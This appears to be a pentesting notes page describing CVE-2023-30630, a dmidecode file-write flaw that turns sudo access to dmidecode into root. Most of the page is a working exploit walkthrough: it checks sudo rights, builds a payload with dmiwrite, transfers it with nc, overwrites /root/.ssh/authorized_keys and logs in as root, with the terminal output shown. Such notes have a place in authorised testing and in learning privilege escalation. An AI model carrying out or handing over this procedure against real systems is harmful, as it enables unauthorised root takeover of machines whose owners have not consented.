# Dmidecode - CVE-2023-30630

Dmidecode is a tool for dumping a computers DMI (SMBIOS) table contents in a human-readable format. This table contains a description of the systems hardware components, as well as other useful pieces of information such as serial numbers and BIOS revisions. 

With root permissions to `dmidecode` a low privileged user can use the application maliciously to <mark style="color:red;">**escalate its privileges**</mark> to root through a <mark style="color:red;">**file write vulnerability**</mark>.&#x20;

{% hint style="info" %}

* Newly created files through `dmidecode` will have the owner `root`. If you instead write to an already existing file, the content will be overwritten but the privileges will be honored.
* You are **not** able to create directories with `dmidecode`. If you plan to privesc through `.ssh/authorized_key` the directory needs to exist.
  * To privesc through `/root/.ssh/authorized_keys`, `PermitRootLogin` must be enabled in `/etc/ssh/sshd_config`
* `dmidecode` will add junk at the beginning of the file, this is not visible with `cat` but you'll see it with `vi/vim`. To circumvent this write your ssh-key on row 2 or below.
* `dmidecode` version 3.3 has a bug that SEGFAULTs the program when trying to exploit, however this is again fixed for version 3.4. This exploit will work on **all versions between 1.8 and 3.4, except 3.3**.
  {% endhint %}

Use the tool [`dmiwrite` ](https://github.com/adamreiser/dmiwrite)to build malicious payload.

```bash
## Find privesc vector on victim host
[user@victimHost index]$ sudo -l
User user may run the following commands on victimHost:
    (root) NOPASSWD: /usr/sbin/dmidecode

## Verify dmidecode version
[user@victimHost ~]$ /usr/sbin/dmidecode -V
3.2

## Create payload on local attack machine. Note that first line will be destroyed with random characters, so the correct payload needs to be on line 2 or below.
➜ cat authorized_keys
ssh-rsa nothing
ssh-rsa AAAAB3NzaC...[SNIP]

## Build payload with dmiwrite
➜ ./dmiwrite authorized_keys authorized_keys.dmi 
Wrote payload of length 741 to authorized_keys.dmi
Padding 982301 bytes to authorized_keys.dmi
	Setting checksum: memset(buf+30, 130, 1);

Wrote DMI header of length 32 to authorized_keys.dmi
Padding 65536 bytes to authorized_keys.dmi
Congratulations, authorized_keys.dmi looks like a valid DMI file.

## Upload file to victim
➜ nc -w3 victimHost 4488 < authorized_keys.dmi
[user@victimHost tmp]$ nc -lvp 4488 > authorized_keys.dmi

## Write file
[user@victimHost tmp]$ sudo /usr/sbin/dmidecode -d authorized_keys.dmi --no-sysfs --dump-bin /root/.ssh/authorized_keys
# dmidecode 3.2
Scanning authorized_keys.dmi for entry point.
SMBIOS 2.1 present.
1 structures occupying 741 bytes.
Table at 0x00000000.

# Writing 741 bytes to /root/.ssh/authorized_keys.
# Writing 0 bytes to /root/.ssh/authorized_keys.
/root/.ssh/authorized_keys: fwrite: No such file or directory

## Login as root
dmiwrite-master ➜ ssh root@victimHost -i victim-id_rsa
[root@victimHost ~]# id
uid=0(root) gid=0(root) groups=0(root)
```

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2Fk8D3ww9C5OCja1PepGHr%2FScreenshot%202023-06-19%20143524.png?alt=media&#x26;token=d253b40f-2048-42f3-be45-62bf673bafbd" alt=""><figcaption><p>Image illustrating junk at the beginning of file</p></figcaption></figure>